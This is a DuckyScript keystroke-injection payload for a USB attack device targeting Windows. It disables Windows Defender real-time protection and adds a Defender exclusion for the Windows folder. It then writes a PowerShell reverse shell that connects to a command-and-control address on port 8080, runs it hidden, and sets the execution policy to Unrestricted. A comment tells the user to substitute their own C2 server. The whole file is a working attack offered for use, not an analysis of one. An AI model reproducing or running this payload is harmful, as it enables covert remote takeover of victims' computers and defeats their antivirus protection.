DELAY 1000
REM --------------- Self Elevating cmd prompt
GUI r
DELAY 200
REM --------------- Disable Windows Defender realtime protection
STRING WindowsDefender://Threat/
ENTER
DELAY 2500
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 400
SPACE
DELAY 1000
LEFTARROW
DELAY 400
ENTER
DELAY 2500
TAB
SPACE
DELAY 400
TAB 
SPACE 
DELAY 400
TAB 
DELAY 200
TAB
SPACE
DELAY 400
ALT F4
DELAY 11000
ALT F4
DELAY 2500
REM ------- Here we need to wait a lot a press ALT F4 several times to close the Windows Defender popup window that inteferes
ALT F4
REPEAT 10
REM --------------- PowerShell with elevated privileges
GUI r
DELAY 200
STRING PowerShell Start PowerShell -Verb RunAs
ENTER
DELAY 2500
LEFTARROW
DELAY 400
ENTER
DELAY 400
STRING Add-MpPreference -ExclusionPath "C:\WINDOWS\*"
ENTER
DELAY 1000
REM --------------- We delete the script before create it again, just to prevent write error
STRING Remove-Item "C:\Windows\config-96449.ps1" -Force
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 2500
REM --------------- Notepad with elevated privileges
GUI r
DELAY 200
STRING PowerShell Start-Process notepad -Verb RunAs
ENTER
DELAY 2500
LEFTARROW
DELAY 400
ENTER
DELAY 400
REM --------------- Replace here IP Address 192.168.1.41 and port 8080 with the IP and port of your command and control listening server
STRING Add-Content "$env:TEMP\96449.ps1" '$c = New-Object System.Net.Sockets.TCPClient("192.168.15.151",8080);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0)
DELAY 400
STRING {;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2  = $sb + "PS " + (pwd).Path + "> ";
DELAY 400
STRING $sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()'
DELAY 400
ENTER
DELAY 400
STRING start-Process powershell.exe -windowstyle hidden "$env:TEMP\96449.ps1"
ENTER
DELAY 400
REM STRING Remove-Item $MyINvocation.InvocationName 
ENTER
DELAY 400
REM -------------- If this doesn't work change g (Guardar) for s (Save)
CTRL g
DELAY 2500
STRING C:\Windows\config-96449.ps1
ENTER
DELAY 1000
REM ----------- Closing notepad
ALT F4 
DELAY 2500  
REM --------------- PowerShell again with elevated priviletes
GUI r
DELAY 200
STRING PowerShell Start PowerShell -Verb RunAs
ENTER
DELAY 2500
LEFTARROW
DELAY 400
ENTER
DELAY 400
STRING Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1000
REM ---------------- change normal for hidden 
STRING powershell.exe -windowstyle normal -File C:\Windows\config-96449.ps1
ENTER
